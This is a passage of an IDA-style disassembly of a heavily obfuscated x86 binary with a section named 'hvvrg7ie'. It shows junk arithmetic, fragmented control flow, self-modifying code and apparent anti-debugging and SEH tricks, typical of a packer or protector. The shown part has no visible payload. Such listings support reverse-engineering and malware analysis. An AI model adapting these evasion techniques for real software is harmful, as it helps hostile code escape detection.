		call	sub_445BE8

loc_454EA8:				; CODE XREF: hvvrg7ie:loc_45A2EFj
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jle	loc_445888
		mov	eax, [ebp-4]
		jmp	loc_442AFD
sub_454E9F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_454EBD:				; CODE XREF: sub_446D8D-90A7j
		jl	loc_456D26
; END OF FUNCTION CHUNK	FOR sub_446D8D

; =============== S U B	R O U T	I N E =======================================



sub_454EC3	proc near		; CODE XREF: sub_45B721-776Bp

; FUNCTION CHUNK AT 0043DEE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446EE6 SIZE 0000000E BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edx
		push	0B5AEFEF6h
		pop	edx
		and	edx, 4F174FB9h
		jmp	loc_43DEE1
sub_454EC3	endp

; ---------------------------------------------------------------------------
		or	eax, ecx
		mov	ebp, 9B23AB6h
		jmp	sub_454BA2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_454EE5:				; CODE XREF: sub_43F227+B755j
		xchg	edx, [esp+0Ch+var_C]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+10h+var_10]
		push	0FFA5AA5Ch
		push	offset loc_445057
		jmp	nullsub_272
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
		rol	edi, 2
		jmp	loc_44AA15
; ---------------------------------------------------------------------------

loc_454F05:				; CODE XREF: hvvrg7ie:0043C0FEj
		mov	[esi], eax
		rol	eax, 1Fh
		sub	eax, edx
; START	OF FUNCTION CHUNK FOR sub_44E34F

loc_454F0C:				; CODE XREF: sub_44E34F-11C9Bj
					; sub_4416C3+8j ...
		jmp	loc_44EE1E
; END OF FUNCTION CHUNK	FOR sub_44E34F
; ---------------------------------------------------------------------------
		jmp	loc_459EBA
; ---------------------------------------------------------------------------
		mov	edx, [esi]
		test	esi, ecx
		jmp	loc_4477FA
; ---------------------------------------------------------------------------

loc_454F1F:				; CODE XREF: hvvrg7ie:0044655Dj
					; hvvrg7ie:loc_44F7B2j
		jnp	loc_449C22
		ror	edi, 9
		jmp	loc_4409E1
; ---------------------------------------------------------------------------

loc_454F2D:				; CODE XREF: hvvrg7ie:loc_454490j
		mov	ebp, 555F9A52h
		jmp	loc_450C37
; ---------------------------------------------------------------------------

loc_454F37:				; CODE XREF: hvvrg7ie:00451EC5j
		xchg	eax, [edx]
		test	ecx, 2EF8F797h
		jmp	loc_441996
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452585

loc_454F44:				; CODE XREF: sub_452585-4AE9j
		jnz	loc_44108A
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 4
		mov	eax, [ebp-4]
		movzx	eax, byte ptr [eax]
		mov	edx, [ebp+8]
		jmp	loc_455D43
; END OF FUNCTION CHUNK	FOR sub_452585
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_454F5F:				; CODE XREF: sub_43EBB6:loc_459742j
		push	edx
		push	eax
		mov	eax, [ebp-18h]
		call	sub_43EBB6
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; START	OF FUNCTION CHUNK FOR sub_4404E7

loc_454F69:				; CODE XREF: sub_4404E7+17C71j
					; sub_4404E7:loc_459581j
		push	1D7CF60Ah
		pop	eax
		sub	eax, 0CAC78FDAh
		push	offset loc_45839F
		jmp	nullsub_364
; END OF FUNCTION CHUNK	FOR sub_4404E7
; ---------------------------------------------------------------------------

loc_454F7F:				; CODE XREF: hvvrg7ie:0044F353j
		add	ecx, ebp
		add	ecx, 0EBDBCE35h
		push	offset sub_43AE41
		jmp	loc_44284E

; =============== S U B	R O U T	I N E =======================================



sub_454F91	proc near		; CODE XREF: sub_43D285+9BA9p
					; hvvrg7ie:0044E887j

; FUNCTION CHUNK AT 00446CC0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446D08 SIZE 0000000A BYTES

		xchg	edi, [esp+0]
		pop	edi
		xor	edx, edx
		call	sub_456DE7

loc_454F9C:				; CODE XREF: sub_43D285+Dj
					; sub_456423-3231j
		mov	eax, ds:dword_4510B0
		jmp	loc_446CC0
sub_454F91	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_454FA6:				; CODE XREF: hvvrg7ie:00450067j
		jb	loc_444918
		jbe	loc_452E54

loc_454FB2:				; CODE XREF: hvvrg7ie:loc_439A5Bj
		push	offset sub_457F6F
		jmp	loc_4495A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B851

loc_454FBC:				; CODE XREF: sub_43B851+5j
		push	0EF12C5F1h
		pop	eax
		add	eax, ds:4000F7h

loc_454FC8:				; CODE XREF: sub_442FD1:loc_44D76Cj
		test	eax, 80000h
		jmp	loc_43DEDC
; END OF FUNCTION CHUNK	FOR sub_43B851
; ---------------------------------------------------------------------------
		push	edi
		push	99330F1Ch
		pop	edi
		or	edi, 0C500DAF4h
		add	edi, 230DF0C4h
		jmp	loc_44823B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_454FEB:				; CODE XREF: sub_4512A0:loc_439465j
		jno	loc_44FB6D

loc_454FF1:				; CODE XREF: sub_4512A0:loc_440A3Cj
		push	esi
		mov	esi, eax
		xchg	esi, [esp+4+var_4]

loc_454FF7:				; CODE XREF: hvvrg7ie:loc_442525j
		jmp	loc_44B37C
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_454FFC:				; CODE XREF: sub_457A97:loc_45864Aj
		xchg	ecx, [esp+0]
		jmp	sub_4562DC
; END OF FUNCTION CHUNK	FOR sub_457A97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C58

loc_455004:				; CODE XREF: sub_449C58:loc_44C67Aj
		mov	eax, [eax]
		mov	edx, eax
		push	eax
		push	7CA3981Bh
		pop	eax
		rol	eax, 9
		xor	eax, 6B6B0FE9h
		jmp	loc_459940
; END OF FUNCTION CHUNK	FOR sub_449C58
; ---------------------------------------------------------------------------

loc_45501D:				; CODE XREF: hvvrg7ie:0043B5C6j
		jnz	loc_43FE8B
		jmp	loc_45AD53
; ---------------------------------------------------------------------------

loc_455028:				; CODE XREF: hvvrg7ie:00449800j
		jbe	loc_44FBC5
		jnp	loc_43ED4F
		jmp	loc_43F916
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446FC5

loc_455039:				; CODE XREF: sub_446FC5:loc_43A531j
		mov	eax, [esp+0]
		push	edx
		call	sub_447162
		mov	eax, 9E471775h
		call	sub_450C5A
		mov	ds:off_41D0B4, eax
		lea	eax, loc_4511D0
		mov	byte ptr [eax],	0C3h
		jmp	loc_4511D0
; END OF FUNCTION CHUNK	FOR sub_446FC5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_455060:				; CODE XREF: sub_457A97-6A1Bj
		call	sub_450C5A
		push	esi

loc_455066:				; CODE XREF: hvvrg7ie:loc_444577j
		mov	esi, edx
		xchg	esi, [esp+4+var_4]
		push	0BD9A709h
		jmp	loc_440FF5
; END OF FUNCTION CHUNK	FOR sub_457A97

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_455075	proc near		; CODE XREF: sub_43A3D5:loc_44C66Fj
		retn
sub_455075	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CB1

loc_455076:				; CODE XREF: sub_449CB1+BEC7j
		jmp	loc_4419B6
; END OF FUNCTION CHUNK	FOR sub_449CB1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_45507B:				; CODE XREF: sub_454099-9486j
		jmp	loc_450342
; END OF FUNCTION CHUNK	FOR sub_454099
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_404. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_455081:				; CODE XREF: sub_456F9F-65B1j
		jmp	loc_443287
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------

loc_455086:				; CODE XREF: hvvrg7ie:0044A271j
		cdq

; =============== S U B	R O U T	I N E =======================================



sub_455087	proc near		; CODE XREF: sub_440AD9+5C5Fp

; FUNCTION CHUNK AT 0043AEB0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B686 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043C235 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043E918 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441EDA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044203A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00442A39 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004475FB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448021 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AA4C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AC9C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D69C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044EDDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045325A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004551A1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045591F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00456410 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00457FD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458003 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0045830B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045877A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004587FB SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00458B81 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045925A SIZE 0000002E BYTES
; FUNCTION CHUNK AT 0045A218 SIZE 0000001C BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	edx
		mov	edx, ebx
		call	sub_44E159

loc_455093:				; CODE XREF: sub_4544AA+6A5Bj
		jmp	loc_4587FB
sub_455087	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455273

loc_455098:				; CODE XREF: sub_455273+9j
		jmp	loc_43E92E
; END OF FUNCTION CHUNK	FOR sub_455273
; ---------------------------------------------------------------------------

loc_45509D:				; CODE XREF: hvvrg7ie:0044ED46j
		mov	ebp, esp
		push	edx
		push	offset loc_43948B
		jmp	loc_4503E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4550AA:				; CODE XREF: sub_43F227+13450j
		add	edi, 90682CD2h
		jmp	loc_43BCB4
; ---------------------------------------------------------------------------

loc_4550B5:				; CODE XREF: sub_43F227:loc_44930Bj
		cmp	dword ptr [ebp-4], 7
		jnz	loc_4395B8
		jmp	loc_44006F
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
		pop	eax
		jmp	loc_43D47C

; =============== S U B	R O U T	I N E =======================================



sub_4550CA	proc near		; CODE XREF: hvvrg7ie:0044CCF9j
					; sub_446B4C:loc_45B545p

; FUNCTION CHUNK AT 0044BFFF SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00452EEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A3EE SIZE 00000008 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		lea	eax, dword_440594

loc_4550D4:				; CODE XREF: hvvrg7ie:loc_440A1Fj
		push	esi
		jmp	loc_45A3EE
sub_4550CA	endp


; =============== S U B	R O U T	I N E =======================================



sub_4550DA	proc near		; DATA XREF: sub_43AB99+1F7C5o

; FUNCTION CHUNK AT 00459DAC SIZE 00000016 BYTES

		xchg	eax, [esp+0]
		lea	eax, [ebp-4]
		push	eax
		push	edx
		push	2474D2D3h
		pop	edx
		jmp	loc_459DAC
sub_4550DA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446297

loc_4550ED:				; CODE XREF: sub_446297:loc_45644Fj
		jz	loc_44E427
; END OF FUNCTION CHUNK	FOR sub_446297
; START	OF FUNCTION CHUNK FOR sub_45265D

loc_4550F3:				; CODE XREF: sub_45265D-20B5j
		jmp	loc_442CC8
; END OF FUNCTION CHUNK	FOR sub_45265D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B7D

loc_4550F8:				; CODE XREF: sub_455B7D-1C704j
		jmp	loc_444A17
; END OF FUNCTION CHUNK	FOR sub_455B7D
; ---------------------------------------------------------------------------
		jge	loc_450C3F
		popf
		jmp	loc_44E421
; ---------------------------------------------------------------------------
		sub	ebx, 7C39F24Bh
		jmp	loc_44D72E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_455114:				; CODE XREF: sub_45038B:loc_45A31Fj
		and	eax, 40A48A28h
		xor	eax, 7D562E09h
		add	eax, ebp
		add	eax, 82ADDBF3h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_441F8D
		jmp	loc_443E79
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------

loc_455138:				; DATA XREF: sub_443564+6o
		push	esi
		push	49E0035Eh
		pop	esi
		or	esi, 0A7E49111h
		jmp	loc_45986F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_45514A:				; CODE XREF: sub_440C05-11E8j
		sub	esi, 4A68D233h
		add	esi, 5D451B4Ch
		mov	[esi], eax
		pop	esi
		push	offset loc_45B114
		jmp	nullsub_235
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_455163:				; CODE XREF: sub_43D531+4BF9j
		jbe	loc_440CFD
		cdq
		jmp	loc_4582E8
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------

locret_45516F:				; CODE XREF: hvvrg7ie:loc_43CDD1j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_455170:				; CODE XREF: sub_448663:loc_451B90j
					; sub_448663+CD92j
		mov	eax, 0A2CD59D9h

loc_455175:				; CODE XREF: sub_44D2F8:loc_45457Ej
		call	sub_450C5A
		xor	eax, 9C4E704Eh
		add	eax, 4C81FB0Eh
		rol	eax, 4
		push	edi
		push	7D20D236h
		jmp	loc_43AB06
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
		mov	ecx, edx
		jmp	sub_43D140
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_474. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_45519C:				; CODE XREF: hvvrg7ie:loc_449577j
					; sub_450F97+65C4j
		jmp	loc_45763A
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_4551A1:				; CODE XREF: sub_455087:loc_459283j
		pop	edi
		sub	edi, 576F87EBh
		jnz	loc_458005
		shr	edx, 9
		pop	ebp
		jmp	loc_458003
; END OF FUNCTION CHUNK	FOR sub_455087

; =============== S U B	R O U T	I N E =======================================



sub_4551B7	proc near		; DATA XREF: sub_45535C-132E7o

; FUNCTION CHUNK AT 0043BEC4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004528CB SIZE 0000000C BYTES

		push	7A2B1416h
		pop	ebx
		or	ebx, 2812F824h
		xor	ebx, 29D877CFh
		test	ebx, 80000h
		jmp	loc_4528CB
sub_4551B7	endp


; =============== S U B	R O U T	I N E =======================================



sub_4551D4	proc near		; DATA XREF: sub_441FE4:loc_44483Fo

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 004390AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457AD3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045B1F0 SIZE 00000005 BYTES

		add	eax, ebp
		add	eax, 0A8297435h
		push	eax
		mov	eax, [ebp-4]
		push	ecx
		mov	ecx, eax
		jmp	loc_4390AE
sub_4551D4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466CE

loc_4551E8:				; CODE XREF: sub_4466CE:loc_44568Bj
		pop	edx
		sub	edx, 4E86AF04h
		and	edx, 8C275D37h
		xor	edx, 43591D0Bh
		rol	edx, 0Dh
		test	edx, 2000h
		jmp	loc_43F4E3
; END OF FUNCTION CHUNK	FOR sub_4466CE
; ---------------------------------------------------------------------------

loc_455209:				; DATA XREF: sub_43E26C+977o
		mov	eax, [ebp-20h]
		call	sub_44D46F
		call	sub_44F9CA
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_455216:				; CODE XREF: sub_44543A+1FB4j
		push	0DBEB59Fh
		pop	eax
		rol	eax, 9
		jb	loc_45601F

loc_455225:				; CODE XREF: sub_4514E0+A145j
		jmp	loc_45B635
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456763

loc_45522A:				; CODE XREF: sub_456763-122F8j
		jmp	loc_4411E3
; END OF FUNCTION CHUNK	FOR sub_456763
; ---------------------------------------------------------------------------
		sub	ebx, 0BE821125h
		jmp	loc_44B0D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447DF9

loc_45523A:				; CODE XREF: sub_447DF9:loc_45AEFAj
		add	edx, 0BDAF0132h
		mov	esi, edx
		xchg	ecx, [eax]
		jmp	sub_443802
; END OF FUNCTION CHUNK	FOR sub_447DF9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_455249:				; CODE XREF: sub_453BBD:loc_439F3Cj
		jz	loc_439E82
		jmp	loc_442D07
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D0C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_18. PRESS	KEYPAD "+" TO EXPAND]
		dd offset sub_44E2D2
; ---------------------------------------------------------------------------
		jmp	loc_45A1BA
; ---------------------------------------------------------------------------
		push	offset loc_451D22
		jmp	loc_4589EC
; ---------------------------------------------------------------------------

loc_45526E:				; DATA XREF: sub_44AB90:loc_45B2C5o
		rol	eax, 1Ah
		push	eax
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_455273	proc near		; CODE XREF: sub_4499A7-D402p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E92E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D34C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455098 SIZE 00000005 BYTES

		push	ebp

loc_455274:				; CODE XREF: sub_4403B6:loc_44A628j
		mov	ebp, esp
		push	edx
		mov	edx, ecx
		xchg	edx, [esp+4+var_4]
		jmp	loc_455098
sub_455273	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_455281:				; CODE XREF: sub_44D2F8:loc_44C1A5j
		jnz	loc_454587
		jmp	loc_4597D8
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_45528C:				; CODE XREF: sub_4500FA-BB50j
		jle	loc_448892
		xchg	ecx, [ebx]
		shr	ecx, 13h
		ror	ecx, 0Dh
		jmp	loc_4470F8
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F6F

loc_45529F:				; CODE XREF: sub_457F6F-98E7j
		test	ebp, 9A1FBC42h
		jmp	loc_44C655
; END OF FUNCTION CHUNK	FOR sub_457F6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_4552AA:				; CODE XREF: sub_4569C6j
		sub	al, 99h
		push	0DFB00BD1h
		pop	edx
		rol	edx, 12h
		or	edx, 97147B17h
		push	offset loc_45AFDB
		jmp	nullsub_520
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443375

loc_4552C5:				; CODE XREF: sub_443375:loc_448CC5j
		xor	eax, 0FE211A8Fh
		sub	eax, 0C2CCA0A4h
		xor	eax, 0B13407CCh
		xchg	eax, [esp+8+var_8]
		push	10h
		mov	eax, [ebp+8]
		push	ebp
		mov	ebp, eax
		jmp	loc_4485FD
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_4552E7:				; CODE XREF: sub_449425-858Aj
		push	ecx
		push	6F1F4BF2h
		pop	ecx
		xor	ecx, 0B6A4E839h
		add	ecx, 409AAD55h
		jmp	loc_45B136
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_4552FF:				; CODE XREF: sub_448100:loc_443043j
		add	eax, 81AD1037h
		mov	eax, [eax]
		popf
		call	sub_44F66B
		mov	[ebp-0Ch], eax
		mov	word ptr [ebp-6], 0FFFFh
		jmp	loc_445C00
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_45531B:				; CODE XREF: sub_44616F+13614j
		push	0E329CA7Ah
		jmp	loc_44C53A
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
		mov	edx, 6FDE1A91h
		push	edx
		push	853FECCCh
		pop	edx
		sub	edx, 4E8D16C1h
		add	edx, 0C991932Bh
		xchg	edx, [esp]
		jmp	loc_448D82
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_455345:				; CODE XREF: sub_451E1C-266Fj
		rol	ebx, 1Bh
		or	edx, 0C370E572h
		mov	ecx, [edx]

loc_455350:				; CODE XREF: sub_44398A:loc_454255j
		pop	large dword ptr	fs:0
		jmp	loc_452E34
; END OF FUNCTION CHUNK	FOR sub_451E1C

; =============== S U B	R O U T	I N E =======================================



sub_45535C	proc near		; CODE XREF: sub_4417B1:loc_4418E6p
					; hvvrg7ie:004439D1j

; FUNCTION CHUNK AT 0044206E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455C13 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A414 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, 553E071Ah
		rol	eax, 1Fh
		jmp	loc_45A414
sub_45535C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440881

loc_45536E:				; CODE XREF: sub_440881:loc_43D02Fj
		cmp	byte ptr [eax],	0F1h
		jnz	loc_443D82
		jmp	loc_45A40F
; END OF FUNCTION CHUNK	FOR sub_440881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_45537C:				; CODE XREF: sub_440C05:loc_44D871j
		jnz	loc_43C087
		jmp	loc_443C12
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_455387:				; CODE XREF: sub_451669-2F78j
		push	155D98B9h
		or	ecx, 0E14A1F79h
		jmp	loc_44761D
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------

loc_455397:				; CODE XREF: hvvrg7ie:004402D2j
		sub	ecx, 0ADDA5F92h
		rol	ecx, 9
		jnb	loc_449A9F

loc_4553A6:				; CODE XREF: hvvrg7ie:0045898Dj
		jmp	loc_450198
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457B8C

loc_4553AB:				; CODE XREF: sub_457B8C+Dj
		jmp	sub_4408AE
; END OF FUNCTION CHUNK	FOR sub_457B8C
; ---------------------------------------------------------------------------
		test	eax, ecx
		jmp	loc_452F92
; ---------------------------------------------------------------------------

loc_4553B7:				; DATA XREF: sub_44191F-44F0o
		cmp	dword ptr [ebp-4], 0
		jz	loc_441477
		jmp	loc_454996
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_4553C6:				; CODE XREF: sub_457F50:loc_43DCA4j
		push	edx
		push	0DB38F0Bh
		pop	edx
		sub	edx, 0C8113155h
		test	edx, 400000h
		jmp	loc_44DB95
; END OF FUNCTION CHUNK	FOR sub_457F50

; =============== S U B	R O U T	I N E =======================================



sub_4553DE	proc near		; CODE XREF: sub_4465A6:loc_440266p
					; hvvrg7ie:0044D275j

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	ecx, [esp-4+arg_0]
		jmp	nullsub_5
sub_4553DE	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_541. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_4553EB:				; CODE XREF: sub_450F97-13818j
		jmp	loc_4472B4
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------

locret_4553F0:				; CODE XREF: hvvrg7ie:loc_43AB8Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_4553F1:				; CODE XREF: sub_448663+9533j
		popf
		xchg	ecx, [edx]
		pop	edx
		jmp	loc_455170
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4485A2

loc_4553FA:				; CODE XREF: sub_4485A2-2BFBj
		jg	sub_4576E4
		test	eax, 90853E71h
		jmp	loc_451C26
; END OF FUNCTION CHUNK	FOR sub_4485A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E34F

loc_45540B:				; CODE XREF: sub_44E34F:loc_43FB9Dj
					; sub_44E34F-1909j
		call	sub_45541B
		retn
; END OF FUNCTION CHUNK	FOR sub_44E34F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AB90

loc_455411:				; CODE XREF: sub_44AB90-A470j
		jmp	loc_43F3A6
; END OF FUNCTION CHUNK	FOR sub_44AB90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_455416:				; CODE XREF: sub_44BFF5-CFB7j
		jmp	loc_44804C
; END OF FUNCTION CHUNK	FOR sub_44BFF5

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45541B	proc near		; CODE XREF: sub_44E34F:loc_45540Bp

var_818		= dword	ptr -818h
var_1C8		= byte ptr -1C8h
var_24		= byte ptr -24h
var_10		= dword	ptr -10h

; FUNCTION CHUNK AT 0044114C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00441280 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044305B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443185 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044338A SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00444239 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004442DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044461B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00449157 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044BDCA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C339 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D5B3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044DAD0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FAD3 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00450CEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045176B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B5D SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0045750E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458A4C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458E17 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00459466 SIZE 0000000B BYTES

		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp+0]
		mov	ebp, esp
		add	esp, 0FFFFF7ECh
		push	473BF986h
		jmp	loc_44DAD0
sub_45541B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_455433:				; CODE XREF: sub_44BCAE-D94Fj
		pop	edx
		sub	edx, 0C61E71CDh
		rol	edx, 18h
		or	edx, ds:4000F0h
		jmp	loc_43E9A6
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439873

loc_455448:				; CODE XREF: sub_439873:loc_4532F3j
					; sub_45A310:loc_45A31Aj
		mov	edx, eax
		push	ecx
		push	0C0470ABAh
		pop	ecx
		jmp	loc_43A661
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF96

loc_455456:				; CODE XREF: sub_43AF96+11C83j
		shl	esi, 14h

loc_455459:				; CODE XREF: sub_43AF96:loc_43AE53j
		cmp	dword ptr [ebp-108h], 31342D37h
		jnz	loc_441D60
		jmp	loc_455BAD
; END OF FUNCTION CHUNK	FOR sub_43AF96
; ---------------------------------------------------------------------------

